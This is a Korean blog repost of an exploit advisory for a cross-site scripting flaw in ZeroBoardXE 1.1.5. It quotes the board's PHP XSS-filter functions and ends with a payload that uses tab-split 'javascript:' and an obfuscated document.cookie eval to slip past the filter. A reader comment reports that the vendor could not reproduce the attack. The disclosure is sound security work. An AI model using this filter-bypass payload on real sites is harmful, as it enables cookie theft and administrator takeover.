관련링크 : http://www.milw0rm.com/exploits/8019
이번 xss의 핵심(?)은 php eval method에 띄어쓰기(? 공백)을 이용 function.inc.php파일의
xss체크를 우회하는것으로 보입니다. xe관리자 권한을 얻어 모든 작업이 가능하게 된다고 합니다.
------------------------------------------------------------------------------------------------------

ZeroBoardXE 1.1.5 (09.01.22) XSS Vulnerability
bY make0day[AT]gmail.com
Greet to : Flyh4t
/*************************

ZeroBoardXE (VERSION 1.1.5 (09.01.22))is most famous and widely used bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
I find a XSS vulnerability.
By using this vulnerability, Malicious person can occupy administrator permission,
It means attacker can control board system fully
Here is the details:

**************************/
TEST ON VERSION ZeroBoardXE 1.1.5 (09.01.22)
Download : http://www.zeroboard.com
/***************************
[0x01] XSS vulnerability

아래코드는 xss를 방지하기 위한 코드인데
/config/func.inc.php

function removeHackTag($content) {
$content = preg_replace_callback("!<([a-z]+)(.*?)>!is", removeJSEvent, $content);
$content = preg_replace_callback("!<([a-z]+)(.*?)>!is", removeSrcHack, $content);
return $content;
}
function removeJSEvent($matches) {
$attrs = $matches[2];
if(preg_match('/(src|href|lowsrc|dynsrc)=("|'?)([rn]*)(vbscript|javascript)/is', $matches[2])) {
$attrs = preg_replace('/(src|href|lowsrc|dynsrc)=("|'?)([rn]*)(vbscript|javascript)/is','$1=$2_$4', $attrs);
}
$attrs = preg_replace(
'/(r|n| )+on(click|dblclick|mousedown|mouseup|mouseover|mouseout|mousemove|keydown|keyup|keypress|load|unload|abort|error|select|change|submit|reset|resize|scroll|focus|blur)+([= ]+)/is',
' _on$2=',
$attrs
);
$attrs = preg_replace('/_onclick=("|')window.open(this.href);(.?)return false;("|')/i','onclick=$1window.open(this.href);$2return false;$3', $attrs);
return '<'.$matches[1].$attrs.'>';
}
function removeSrcHack($matches) {
$tag = strtolower(trim($matches[1]));
$buff = trim(preg_replace('/(/>|>)/','/>',$matches[0]));
$buff = str_replace(array('&amp;','&'),array('&amp;','&amp;'),$buff);
$buff = preg_replace_callback('/([^=^"^ ]*)=([^ ^>]*)/i', fixQuotation, $buff);
$oXmlParser = new XmlParser();
$xml_doc = $oXmlParser->parse($buff);
$src = $xml_doc->{$tag}->attrs->src;
$dynsrc = $xml_doc->{$tag}->attrs->dynsrc;
$lowsrc = $xml_doc->{$tag}->attrs->lowsrc;
$href = $xml_doc->{$tag}->attrs->href;
if(_isHackedSrc($src) || _isHackedSrc($dynsrc) || _isHackedSrc($lowsrc) || _isHackedSrc($href) ) return sprintf("<%s>",$tag);
return $matches[0];
}
function _isHackedSrc($src) {
if(!$src) return false;
if($src) {
$url_info = parse_url($src);
$query = $url_info['query'];
$queries = explode('&', $query);
$cnt = count($queries);
for($i=0;$i<$cnt;$i++) {
$tmp_str = strtolower(trim($queries[$i]));
$pos = strpos($tmp_str,'=');
if($pos === false) continue;
$key = strtolower(trim(substr($tmp_str, 0, $pos)));
$val = strtolower(trim(substr($tmp_str,$pos+1)));
if( ($key=='module'&&$val=='admin') || ($key=='act'&&preg_match('/admin/i',$val)) ) return true;
}
}
return false;
}



다음과 같이 php eval method에 공백을 이용 xss 체크를 우회할 수 있다고 합니다.
<img lowsrc="j	a	v	a	s	c	ri	pt:alert((eval(('D'+'o'+'C'+'u'+'M'+'e'+'N'+'t'+'.'+'C'+'o'+'O'+'k'+'I'+'e').toLowerCase())));"> 


  1. Favicon of http://free4u.wo.tc/ EcusE 2009.03.12 22:45

    exploit 제작자는 된다고 하는데 xe의 관리자 제로님은 실행되지 않는걸 확인했다고 하네요.http://www.xpressengine.com/17841102#74

+ Recent posts